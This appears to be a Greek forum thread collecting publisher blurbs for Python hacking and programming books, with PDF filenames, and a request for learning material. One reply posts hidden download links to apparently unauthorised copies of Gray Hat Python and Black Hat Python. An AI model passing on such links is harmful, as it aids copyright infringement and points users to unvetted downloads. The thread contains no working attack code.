Learn the basics of ethical hacking and gain insights into the logic, algorithms, and syntax of Python. This book will set you up with a foundation that will help you understand the advanced concepts of hacking in the future. Learn Ethical Hacking with Python 3 touches the core issues of cyber security: in the modern world of interconnected computers and the Internet, security is increasingly becoming one of the most important features of programming. Ethical hacking is closely related to Python. For this reason this book is organized in three parts. The first part deals with the basics of ethical hacking; the second part deals with Python 3; and the third part deals with more advanced features of ethical hacking. What You Will Learn Discover the legal constraints of ethical hacking Work with virtual machines and virtualization Develop skills in Python 3 See the importance of networking in ethical hacking Gain knowledge of the dark web, hidden Wikipedia, proxy chains, virtual private networks, MAC addresses, and more Who This Book Is For Beginners wanting to learn ethical hacking alongside a modular object oriented programming language. Beginning Ethical Hacking with Python by Sinha, Sanjib.pdf

Implement defensive techniques in your ecosystem successfully with Python Key Features Identify and expose vulnerabilities in your infrastructure with Python Learn custom exploit development . Make robust and powerful cybersecurity tools with Python Book Description With the current technological and infrastructural shift, penetration testing is no longer a process-oriented activity. Modern-day penetration testing demands lots of automation and innovation; the only language that dominates all its peers is Python. Given the huge number of tools written in Python, and its popularity in the penetration testing space, this language has always been the first choice for penetration testers. Hands-On Penetration Testing with Python walks you through advanced Python programming constructs. Once you are familiar with the core concepts, you’ll explore the advanced uses of Python in the domain of penetration testing and optimization. You’ll then move on to understanding how Python, data science, and the cybersecurity ecosystem communicate with one another. In the concluding chapters, you’ll study exploit development, reverse engineering, and cybersecurity use cases that can be automated with Python. By the end of this book, you’ll have acquired adequate skills to leverage Python as a helpful tool to pentest and secure infrastructure, while also creating your own custom exploits. What you will learn Get to grips with Custom vulnerability scanner development Familiarize yourself with web application scanning automation and exploit development Walk through day-to-day cybersecurity scenarios that can be automated with Python Discover enterprise-or organization-specific use cases and threat-hunting automation Understand reverse engineering, fuzzing, buffer overflows , key-logger development, and exploit development for buffer overflows. Understand web scraping in Python and use it for processing web responses Explore Security Operations Centre (SOC) use cases Get to understand Data Science, Python, and cybersecurity all under one hood Who this book is for If you are a security consultant , developer or a cyber security enthusiast with little or no knowledge of Python and want in-depth insight into how the pen-testing ecosystem and python combine to create offensive tools , exploits , automate cyber security use-cases and much more then this book is for you. Hands-On Penetration Testing with Python guides you through the advanced uses of Python for cybersecurity and pen-testing, helping you to better understand security loopholes within your infrastructure . Table of Contents Introduction to Python Building Python Scripts Concept Handling Advanced Python Modules Vulnerability Scanner Python - Part 1 Vulnerability Scanner Python - Part 2 Machine Learning and Cyber Security Automating Web Application Scanning - Part 1 Automated Web Application Scanning - Part 2 Building a Custom Crawler Reverse-Engineering Linux Applications Reverse Engineering Windows Applications Exploit Development Cyber Threat Intelligence Other Wonders of Python Assessments Hands-On Penetration Testing with Python Enhance your ethical hacking skills to build automated and intelligent systems by Furqan Khan - Αγγλική Γλώσσα.Pdf

Do you have a biological question that could be readily answered by computational techniques, but little experience in programming? Do you want to learn more about the core techniques used in computational biology and bioinformatics? Written in an accessible style, this guide provides a foundation for both newcomers to computer programming and those interested in learning more about computational biology. The chapters guide the reader through: a complete beginners' course to programming in Python, with an introduction to computing jargon; descriptions of core bioinformatics methods with working Python examples; scientific computing techniques, including image analysis, statistics and machine learning. This book also functions as a language reference written in straightforward English, covering the most common Python language elements and a glossary of computing and biological terms. This title will teach undergraduates, postgraduates and professionals working in the life sciences how to program with Python, a powerful, flexible and easy-to-use language. Python Programming for Biology- Bioinformatics and Beyond 1st Edition.Pdf

Αυτό το βιβλίο είναι στα Ισπανικά. python para todos.pdf

Το βιβλίο αυτό είναι στα Ισπανικά. hacking con python.pdf

Python is still the dominant language in the world of information security, even if the conversation about your language of choice sometimes looks more like a religious war. Python-based tools include all manner of fuzzers, proxies, and even the occasional exploit. Exploit frameworks like CANVAS are written in Python as are more obscure tools like PyEmu or Sulley. Just about every fuzzer or exploit I have written has been in Python. In fact, the automotive hacking research that Chris Valasek and I recently performed contained a library to inject CAN messages onto your automotive network using Python! If you are interested in tinkering with information security tasks, Python is a great language to learn because of the large number of reverse engineering and exploitation libraries available for your use. Now if only the Metasploit developers would come to their senses and switch from Ruby to Python, our community would be united. In this new book, Justin covers a large range of topics that an enterprising young hacker would need to get off the ground. He includes walkthroughs of how to read and write network packets, how to sniff the network, as well as anything you might need for web application auditing and attacking. He then spends significant time diving into how to write code to address specifics with attacking Windows systems. In general, Black Hat Python is a fun read, and while it might not turn you into a super stunt hacker like myself, it can certainly get you started down the path. Remember, the difference between script kiddies and professionals is the difference between merely using other people’s tools and writing your own. Charlie Miller St. Louis, Missouri September 2014 Black Hat python Python Programming for Hackers and Pentesters.pdf

Gray Hat Python : [hide]http://www.chinastor.org/upload/2015-08/15081917086229.pdf[/hide] https://www.virustotal.com/en/url/dea21a132ece7e32f423b310a43bc7fa024f44d66ae531ab8191e3affdf2a053/analysis/ (Για καποιο λογο το vt δεν μπορουσε να κανει scan στο αρχειο παραμονο στο site.) Black Hat Python : [hide]https://pythonizame.s3.amazonaws.com/media/Book/black-hat-python/file/af0ef90e-83cf-11e5-964d-04015fb6ba01.pdf[/hide] https://www.virustotal.com/en/file/90b5fafc021656dc9335678e565bdc370d948b2de01098557c8ecd1859062f04/analysis/1463761596/

Γειά σας παιδιά. Θέλω να ασχοληθώ με τον προγραμματισμό συγκεκριμένα με την python! Υπάρχει κάποιος που θα μπορούσε να βοηθήσει είτε ο ίδιος είτε στέλνοντας μου βιβλία (αγγλικά ή ελληνικά!)? επίσης θέλω να εφαρμόσω τον προγραμματισμό και τις γνώσεις που θα αποκτήσω στο hacking ..(η δημιουργία είναι ωραία ) όλα για καλό σκοπό αλλιώς δεν πάμε πουθενά Ευχαριστώ για την όποια βοήθεια!